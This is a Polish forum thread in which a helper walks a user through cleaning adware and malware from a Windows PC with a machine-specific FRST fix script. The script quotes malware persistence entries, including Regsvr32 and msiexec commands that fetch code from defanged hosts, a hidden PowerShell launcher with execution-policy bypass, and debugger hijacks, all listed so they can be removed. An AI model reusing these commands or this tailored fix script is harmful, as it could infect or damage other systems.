C:\Users\Tomek\AppData\Local\Baglook C:\Users\Tomek\AppData\Local\Firefox C:\Users\Tomek\AppData\Local\terana C:\Users\Tomek\AppData\Local\Temp C:\Users\Tomek\AppData\Roaming\Firefox C:\Users\Tomek\AppData\Roaming\MailUpdate C:\Users\Tomek\AppData\Roaming\Picexa Viewer C:\Users\Tomek\AppData\Roaming\Temp C:\Users\Tomek\AppData\Roaming\WinSAPSvc C:\Users\Tomek\AppData\Roaming\WinZipper C:\Windows\System32\log C:\Windows\System32\Tasks\Milimili Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik umieść w tym samym folderze skąd uruchamiasz FRST. Uruchom FRST i klik w Napraw (Fix). Przedstaw wynikowy fixlog.txt. 2. Sprawdź czy jest możliwe zalogowanie do Windows. Jeśli tak, zrób cały zestaw raportów FRST.

Nie widzę żadnych zmian. Usuń adresy adware ręcznie z Google Chrome: Ustawienia > karta Ustawienia > Po uruchomieniu > Otwórz konkretną stronę lub zestaw stron > usuń wszystkie adresy > przestaw na "Otwórz stronę nowej karty" I czy przekierowania nadal mają miejsce?

1. Nadal widzę przekierowania luckysearch123.com w Google Chrome. Ustawienia > karta Ustawienia > Po uruchomieniu > Otwórz konkretną stronę lub zestaw stron > usuń adres luckysearch123.com, przestaw na "Otwórz stronę nowej karty" Ustawienia > karta Ustawienia > Wygląd i kliknij w napis "Pokaż przycisk strony startowej" > przełącz na opcję "Niestandardową" i usuń adres luckysearch123.com, następnie przełącz z powrotem na "Nową kartę". I czy na pewno ta wyszukiwarka nie figuruje na liście wyboru szukajek? 2. Uruchom FRST, w polu Szukaj (Search) wklej co poniżej i klik w Szukaj w rejestrze (Search Registry). Przedstaw wynikowy SearchReg.txt. Bagsarah;Firefox 3. Uruchom AdwCleaner. Wybierz opcję Skanuj i dostarcz log wynikowy z folderu C:\AdwCleaner.

Fixlog pokazuje, że wszystko przetworzone, ale nowe skany FRST są niepoprawne: uszkodzony nieomal pusty plik FRST.txt + stary plik Addition.txt z wczoraj sprzed usuwania. Usunęłam te dwa załączniki. Zrób nowe skany FRST i doczep do posta powyżej. Pliku Fixlog rzecz jasna nie ruszaj.

Temat przenoszę do działu malware - w systemie grasuje infekcja (ostatnio ładowana przez wynalazki typu KMSpico), poza tym inne ślady modyfikacji adware (np. fałszywe przeglądarki). Operacje do przeprowadzenia: 1. Klawisz z flagą Windows + X > Programy i funkcje > odinstaluj lewy program YAC(Yet Another Cleaner!) oraz fałszywy WorldOfTanks. Nie pomyl programów, tylko pierwsze wejście jest poprawne od gry: World of Tanks (HKU\S-1-5-21-2811866817-1435534820-1235014540-1001\...\{1EAC1D02-C6AC-4FA6-9A44-96258C37C812eu}_is1) (Version: - Wargaming.net) WorldofTanks (HKLM-x32\...\WorldofTanks) (Version: - ) 2. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść: CloseProcesses: CreateRestorePoint: R2 FirefoxU; C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe [116376 2017-05-24] () R2 OneDirveSrv; C:\ProgramData\Microsoft OneDrive\setup\SyncTool.dll [129024 2017-05-10] () [brak podpisu cyfrowego] S2 pgt_svc; C:\Program Files (x86)\ProxyGate\MainService.exe [2285664 2017-02-22] (Gold Click Ltd) S2 iSafeService; C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc.exe [X] S3 iSafeKrnlBoot; C:\Windows\System32\DRIVERS\iSafeKrnlBoot.sys [55056 2016-05-23] (Elex do Brasil Participações Ltda) R1 iSafeNetFilter; C:\Windows\System32\DRIVERS\iSafeNetFilter.sys [52392 2016-05-19] (Elex do Brasil Participações Ltda) S1 iSafeKrnl; \??\C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnl.sys [X] S1 iSafeKrnlKit; \??\C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlKit.sys [X] S1 iSafeKrnlMon; \??\C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlMon.sys [X] S1 iSafeKrnlR3; \??\C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlR3.sys [X] Task: {0D7F4DB9-573C-4080-AF4A-79B3D6AAB75D} - System32\Tasks\Windows-WoShiBeiYongDe => Regsvr32.exe /s /i:hxxp://u76wtn6.x.incapdns.net/?data=zDlkMj8cRWwcNkMxMWYxMWQYNkE2FkM2MUF8MjVXFjw2N8I2Mq== scrobj.dll Task: {10A81261-90F5-46B2-9684-6D8778E04859} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lbyhbyc.com/?data=zDlkMj8cRWwcNkMxMWYxMWQYNkE2FkM2MUF8MjVXFjw2N8I2Mq== scrobj.dll Task: {D48645EB-CC21-43F7-8FDE-9A023E2D224A} - System32\Tasks\Windows_Antimalware_System_Host => C:\ProgramData\MicrosoftCorporation\Windows\SystemData\Isass.exe [2017-06-12] (® Microsoft Corporation. All rights reserved.) Task: {E39F1B69-B55E-4D0E-954C-D79A1A0D5386} - System32\Tasks\Windows_Antimalware_Host => powershell -WindowStyle Hidden -ExecutionPolicy Bypass -NoP -file C:\ProgramData\u3bO8YL0WR.ps1 Task: C:\Windows\Tasks\One System Care Task.job => C:\PROGRA~2\ONESYS~1\SystemConsole.exe Task: C:\Windows\Tasks\One System CarePeriod.job => HKU\S-1-5-21-2811866817-1435534820-1235014540-1001\...\Run: [Local Security Authority Process] => C:\ProgramData\MicrosoftCorporation\Windows\SystemData\Isass.exe [245248 2017-06-12] (® Microsoft Corporation. All rights reserved.) HKU\S-1-5-21-2811866817-1435534820-1235014540-1001\...\Run: [Local Security Authority Processor] => C:\ProgramData\MicrosoftCorporation\Windows\SystemData\Isass.exe [245248 2017-06-12] (® Microsoft Corporation. All rights reserved.) HKU\S-1-5-21-2811866817-1435534820-1235014540-1001\...\Policies\system: [shell] explorer.exe,msiexec.exe /i hxxp://point.orangeiloveyou.com/?data=zDlkMj8cRWwcNkMxMWYxMWQYNkE2FkM2MUF8MjVXFjw2N8I2Mq== /q HKLM-x32\...\Run: [] => [X] IFEO\DisplaySwitch.exe: [Debugger] IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe IFEO\taskmgr.exe: [Debugger] HKU\S-1-5-21-2811866817-1435534820-1235014540-1001\...\ChromeHTML: -> C:\Program Files (x86)\Bagsarah\Application\chrome.exe (Google Inc.) HKU\S-1-5-21-2811866817-1435534820-1235014540-1001\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Bagsarah\Application\chrome.exe (Google Inc.) HKLM\...\StartupApproved\Run32: => "Start_BusinessEverywhere_{ad30a369-08e3-414c-9d2c-7f47dbe748da}" HKLM\...\StartupApproved\Run32: => "Start_SMSNotifier_{ad30a369-08e3-414c-9d2c-7f47dbe748da}" HKLM\...\StartupApproved\Run32: => "Start_Update_{ad30a369-08e3-414c-9d2c-7f47dbe748da}" HKU\S-1-5-21-2811866817-1435534820-1235014540-1001\...\StartupApproved\Run: => "World of Tanks" HKU\S-1-5-21-2811866817-1435534820-1235014540-1001\...\StartupApproved\Run: => "DAEMON Tools Lite Automount" DeleteKey: HKCU\Software\Bagsarah DeleteKey: HKCU\Software\Firefox DeleteKey: HKLM\SOFTWARE\MozillaPlugins DeleteKey: HKLM\SOFTWARE\WOW6432Node\Bagsarah DeleteKey: HKLM\SOFTWARE\WOW6432Node\Firefox DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins C:\Program Files\KMSpico C:\Program Files (x86)\Bagsarah C:\Program Files (x86)\BiaoJi C:\Program Files (x86)\Elex-tech C:\Program Files (x86)\Firefox C:\Program Files (x86)\ProxyGate C:\ProgramData\u3bO8YL0WR.ps1 C:\ProgramData\5f5e51cb-5c01-0 C:\ProgramData\5f5e51cb-4bd3-1 C:\ProgramData\MicrosoftCorporation C:\ProgramData\Microsoft OneDrive\setup\SyncTool.dll C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinDirStat C:\Users\Barteczek\AppData\Local\Bagsarah C:\Users\Barteczek\AppData\Local\Firefox C:\Users\Barteczek\AppData\Local\minergate-cli C:\Users\Barteczek\AppData\Local\Mozilla C:\Users\Barteczek\AppData\LocalLow\Mozilla C:\Users\Barteczek\AppData\Roaming\BrowserModule C:\Users\Barteczek\AppData\Roaming\Firefox C:\Users\Barteczek\AppData\Roaming\Mozilla C:\Users\Barteczek\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk C:\Users\Barteczek\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Isass.lnk C:\Users\Barteczek\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WorldofTanks C:\Users\Barteczek\Downloads\torrentex0.1.4b.exe C:\Users\Public\Documents\chrome C:\Users\Public\Documents\report.dat C:\Users\Public\Documents\temp.dat C:\Windows\SysWOW64\00 C:\Windows\SysWOW64\11 C:\Windows\SysWOW64\1111 C:\Windows\SysWOW64\1111111 C:\Windows\SysWOW64\33 C:\Windows\SysWOW64\3333333 C:\Windows\SysWOW64\55 C:\Windows\SysWOW64\GZ CMD: netsh advfirewall reset EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Zostały usunięte wszystkie skróty fałszywych przeglądarek. Odtwórz w wybranych miejscach skróty do prawdziwego Google Chrome. Uruchom przeglądarkę i wyczyść ją z adware: Zresetuj synchronizację (o ile włączona): KLIK. Ustawienia > karta Rozszerzenia > odinstaluj adware Tables. Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone. Ustawienia > karta Ustawienia > sekcja Wyszukiwarka > z rozwijanego menu ustaw jako domyślną Google > klik w Zarządzaj wyszukiwarkami i skasuj z listy wszystkie inne pozycje. Ustaw też przeglądarkę jako domyślną 4. Zrób nowy log FRST z opcji Skanuj (Scan), bez Shortcut. Dołącz też plik fixlog.txt.